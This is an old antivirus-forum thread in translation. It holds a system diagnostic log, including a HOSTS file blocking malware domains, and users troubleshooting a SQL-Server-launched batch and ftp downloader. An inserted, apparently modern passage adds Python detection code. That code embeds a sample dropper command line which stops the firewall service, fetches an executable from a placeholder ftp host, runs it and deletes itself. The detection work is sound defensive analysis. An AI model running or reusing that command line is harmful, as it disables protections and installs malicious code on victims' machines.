[C:\Program Files\Rising\Rfw\RsXML.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[C:\Program Files\Rising\Rfw\PngDll.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[PID: 2272 / Administrator][D:\工具\网络\Maxthon2\Maxthon.exe] [Maxthon International ltd., 2, 1, 0, 1870]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[D:\工具\网络\Maxthon2\mxpp.dll] [Maxthon International ltd., 1, 0, 0, 107]
[D:\工具\网络\Maxthon2\MxSk.dll] [Maxthon, 1, 0, 0, 351]
[D:\工具\网络\Maxthon2\MxProxy2.dll] [Maxthon International ltd., 1, 0, 0, 4030]
[D:\工具\网络\Maxthon2\MxExt.dll] [N/A, ]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[D:\工具\网络\Maxthon2\mxtool.dll] [, 1, 0, 0, 1]
[D:\工具\网络\Maxthon2\maxzlib.dll] [, 1.2.3]
[D:\工具\网络\Maxthon2\mxfeedU.dll] [, 1, 0, 45, 92]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[D:\工具\网络\Maxthon2\Modules\MxWebBoost\MxWebBoost.dll] [Maxthon, 1,0,2,1187]
[D:\工具\网络\Maxthon2\mxdb.dll] [Max, 3, 5, 3, 125]
[C:\WINDOWS\system32\ieframe.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\JDWB20.IME] [五星工作室, 4.00.950]
[C:\WINDOWS\system32\GOOGLEPINYIN.IME] [Google Inc., ]
[C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx] [Adobe Systems, Inc., 9,0,124,0]
[PID: 2712 / Administrator][D:\工具\系统工具\系统诊断工具sreng2\SREngPS.EXE] [Smallfrogs Studio, 2.5.16.900]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[D:\工具\系统工具\系统诊断工具sreng2\Upload\3rdUpd.DLL] [Smallfrogs Studio, 2, 1, 0, 15]
1234567i - 2008-9-2 22:10:00
==================================
File associations
.TXT Error. [C:\WINDOWS\notepad.exe %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM Error. ["hh.exe" %1]
.HLP OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS Error. [超级解霸3000]
.JS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]
==================================
Winsock providers
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS file
127.0.0.1 localhost
127.0.0.1 yu.8s7.net
127.0.0.1 1.jopanqc.com
127.0.0.1 2.joppnqq.com
127.0.0.1 wg.47255.com
127.0.0.1 1.joppnqq.com
127.0.0.1 xxx.m111.biz
127.0.0.1 1.jopenqc.com
127.0.0.1 1.jopenkk.com
127.0.0.1 xxx.vh7.biz
127.0.0.1 xxx.j41m.com
127.0.0.1 3.joppnqq.com
127.0.0.1 d.93se.com
127.0.0.1 www.868wg.com
127.0.0.1 xxx.mmma.biz
127.0.0.1 ilove.com
127.0.0.1 tp.shpzhan.cn
127.0.0.1 www.tomwg.com
127.0.0.1 www.cike007.cn
127.0.0.1 www.22aaa.com
127.0.0.1 xx.exiao01.com
127.0.0.1 www.exiao01.com
127.0.0.1 www.exiao01.com
127.0.0.1 new.749571.com
127.0.0.1 xtx.kv8.info
127.0.0.1 cao.kv8.info
127.0.0.1 1.jopmmqq.com
127.0.0.1 171817.171817.com
127.0.0.1 d2.llsging.com
127.0.0.1 down.malasc.cn
127.0.0.1 llboss.com
127.0.0.1 nx.51ylb.cn
127.0.0.1 my.531jx.cn
127.0.0.1 qqq.dzydhx.com
127.0.0.1 qqq.hao1658.com
127.0.0.1 www.333292.com
127.0.0.1 down.18dd.net
127.0.0.1 up.22x44.com
127.0.0.1 aaa.faba01.com
127.0.0.1 bad.tqdlt.cn
127.0.0.1 1.chsipo.com
127.0.0.1 c3.aishangai.net
127.0.0.1 c2.aishangai.net
127.0.0.1 xxx.188dm.com
127.0.0.1 x2.1a2b3c1.com
127.0.0.1 d1.163500.net
127.0.0.1 down.google-serv.cn
127.0.0.1 idc.windowsupdeta.cn
127.0.0.1 nc.mskess.com
127.0.0.1 ok.sl8cjs.cn
127.0.0.1 dl.pvs360.com
127.0.0.1 ta.pvs360.com
127.0.0.1 cw.pvs360.com
127.0.0.1 fg.pvs360.com
==================================
Process privilege scan
Special privilege granted: SeLoadDriverPrivilege [PID = 1748, C:\PROGRA~1\MICROS~2\MSSQL\BINN\SQLSERVR.EXE]
Special privilege granted: SeDebugPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
Special privilege granted: SeDebugPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
Special privilege granted: SeDebugPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
Special privilege granted: SeDebugPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
Special privilege granted: SeDebugPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
Special privilege granted: SeDebugPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
Special privilege granted: SeDebugPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
Special privilege granted: SeDebugPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]
Special privilege granted: SeLoadDriverPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]
==================================
API HOOK
Entry point error: CreateProcessA (Risk level: High, hooked by the following module: 0x00FF3DA5)
Entry point error: CreateProcessW (Risk level: High, hooked by the following module: 0x00FF3E8D)
==================================
Hidden processes
N/A
==================================
月神の舞者 - 2008-9-2 22:10:00
... My head hurts. Killing one virus is this much trouble? Maybe I should go research some byte-vanishing hardware and just delete the bytes directly...
SpeW - 2008-9-2 22:18:00
If the OP had used Rising's active defense to protect CMD early on, there wouldn't have been all this trouble. Sigh.............. The problem is very complicated now; reading through that log will probably take a good while.
sihaiweijia - 2008-9-2 23:45:00
How about stopping cmd from running first, and then deleting?
Disable cmd in Group Policy.
1234567i - 2008-9-3 9:19:00
The post above is the best plan, but the path for cmd in Group Policy is....
Frank3160449 - 2008-9-3 9:37:00
Just use X-DELBOX to delete the virus and suppress its regeneration. Then use Group Policy..
1234567i - 2008-9-3 23:12:00
I set the security on cmd.exe so that only the administrator user can access it, which solves the problem for now. The cmd processes no longer pop up.
hongjiaen - 2008-9-3 23:57:00
Since it is batch-based,
first rename cmd.exe, then clean everything out, and rename it back once you are done.
1234567i - 2008-9-4 18:01:00
The way this virus works should be as follows:
1. It launches a batch program through the sqlserver database process.
2. The batch generates *.sys and *.bat files and writes into them the code that downloads the virus files via ftp.
3. It runs the generated batch file, which downloads the virus via ftp.
4. Once the download completes, it runs the virus and deletes the download batch program, wiping out traces of where the virus came from.
In other words, the *.sys and *.bat files mentioned above are not the virus themselves; they are used to download the virus.
The real virus is boots1.exe, bootss.exe and the like.
From searching my machine, these viruses were never successfully downloaded to my computer, probably because I disabled ftp.
The nasty thing about this virus is that unless you kill the virus code inside the sqlserver program, it will keep downloading all kinds of versions of viruses and trojans from different ftp servers, leaving your computer on the edge of danger.
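Building on the mechanism the post above lays out (SQL Server spawns cmd.exe, cmd echoes an ftp script and a batch file to disk, the batch runs `ftp -s:` and launches whatever was fetched), here is an added example of what a responder would write to turn that description into something checkable. It is my own code, not anything from the thread, from Rising, or from the malware: it replays the echo redirections of such a command line to reconstruct the files the dropper writes, pulls out the indicators (ftp host, credentials, downloaded file, dropped paths, stopped firewall service), and flags sqlservr.exe spawning a cmd.exe of that shape as a detection rule. The command line, host name, credentials and file names it runs on are constructed placeholders rather than the ones on the page; the parent check assumes the image name sqlservr.exe, as it appears in the SREng privilege scan above.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample with the same shape as the droppers described in the thread; the
# host, credentials and file names are placeholders, not the ones from the post.
SAMPLE_CMDLINE = (
    '"C:\\WINDOWS\\system32\\cmd.exe" /c net1 stop sharedaccess'
    '&echo open ftp.example.invalid>dl.sys'
    '&echo user1>>dl.sys'
    '&echo pass1>>dl.sys'
    '&echo get payload.exe C:\\drop.exe>>dl.sys'
    '&echo bye>>dl.sys'
    '&echo ftp -s:dl.sys>run.bat'
    '&echo start C:\\drop.exe>>run.bat'
    '&echo del dl.sys>>run.bat'
    '&echo del %0>>run.bat'
    '&run.bat'
)

ECHO_REDIRECT = re.compile(r'^echo\s(.*?)\s*(>>|>)\s*(\S+)$', re.IGNORECASE)
STOP_SERVICE = re.compile(r'^(?:net1?|sc)\s+stop\s+(\S+)', re.IGNORECASE)
FTP_SCRIPT_FLAG = re.compile(r'\bftp\s+-s:', re.IGNORECASE)

@dataclass
class DropperIOCs:
    ftp_host: Optional[str] = None
    ftp_user: Optional[str] = None
    ftp_pass: Optional[str] = None
    downloads: list = field(default_factory=list)        # (remote name, local path)
    executed: list = field(default_factory=list)         # files the dropper launches
    stopped_services: list = field(default_factory=list)
    generated_files: dict = field(default_factory=dict)  # name -> lines written by echo

def split_commands(cmdline: str) -> list:
    """Return the '&'-chained commands that follow 'cmd.exe /c'."""
    m = re.search(r'\s/c\s+(.*)$', cmdline, re.IGNORECASE | re.DOTALL)
    body = m.group(1) if m else cmdline
    return [seg.strip() for seg in body.split('&') if seg.strip()]

def reconstruct(cmdline: str):
    """Replay the echo redirections to rebuild the files the dropper writes.
    Returns (files, direct): direct holds the commands run without redirection."""
    files, direct = {}, []
    for seg in split_commands(cmdline):
        m = ECHO_REDIRECT.match(seg)
        if not m:
            direct.append(seg)
            continue
        text, op, name = m.group(1).strip(), m.group(2), m.group(3).lower()
        if op == '>':  # a single '>' truncates the file, '>>' appends to it
            files[name] = []
        files.setdefault(name, []).append(text)
    return files, direct

def _start_target(line: str) -> Optional[str]:
    # 'start [/high] [""] path' -> path; None for any other line
    toks = line.split()
    if not toks or toks[0].lower() != 'start':
        return None
    rest = [t for t in toks[1:] if t.lower() != 'start' and not t.startswith('/') and t != '""']
    return rest[0] if rest else None

def extract_iocs(cmdline: str) -> DropperIOCs:
    files, direct = reconstruct(cmdline)
    iocs = DropperIOCs(generated_files=files)
    for cmd in direct:
        m = STOP_SERVICE.match(cmd)
        if m:
            iocs.stopped_services.append(m.group(1).lower())
        elif cmd.lower().endswith('.bat'):
            iocs.executed.append(cmd)
    for lines in files.values():
        it = iter(lines)
        for line in it:
            low = line.lower()
            if low.startswith('open '):
                # ftp -s: answers the login prompts with the two lines after 'open'
                iocs.ftp_host = line.split(None, 1)[1]
                iocs.ftp_user, iocs.ftp_pass = next(it, ''), next(it, '')
            elif low.startswith('get '):
                parts = line.split()
                iocs.downloads.append((parts[1], parts[2] if len(parts) > 2 else parts[1]))
            else:
                target = _start_target(line)
                if target:
                    iocs.executed.append(target)
    return iocs

def is_sql_cmd_dropper(parent_image: str, child_image: str, cmdline: str) -> bool:
    """Detection rule: SQL Server spawning a cmd.exe that echo-builds an ftp -s: script."""
    parent, child = (p.rsplit('\\', 1)[-1].lower() for p in (parent_image, child_image))
    if parent != 'sqlservr.exe' or child != 'cmd.exe':
        return False
    files, direct = reconstruct(cmdline)
    builds_script = any(ls and ls[0].lower().startswith('open ') for ls in files.values())
    runs_ftp = any(FTP_SCRIPT_FLAG.search(l) for ls in files.values() for l in ls) or \
        any(FTP_SCRIPT_FLAG.search(c) for c in direct)
    return builds_script and runs_ftp
```

Fed with process-creation records that carry the parent image, child image and full command line, `is_sql_cmd_dropper` catches the behaviour at the moment the cmd process appears, which matters here because the downloaded executables never landed on disk and only the command line survives. The reconstruction step is also the quickest way to read these one-liners: the rebuilt `dl.sys` is exactly the ftp script the batch would run, so the host, account and target path can be blocked or hunted for without executing anything.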
1234567i - 2008-9-4 18:02:00
And you will never know where these viruses came from. Kill one and another one shows up.
onlysword - 2008-9-23 22:11:00
Can't Rising put out a concrete way to solve this problem? I'm a serious victim of it. I can't kill it no matter what. Is Rising's antivirus just not working?
© 2000 - 2026 Rising Corp. Ltd.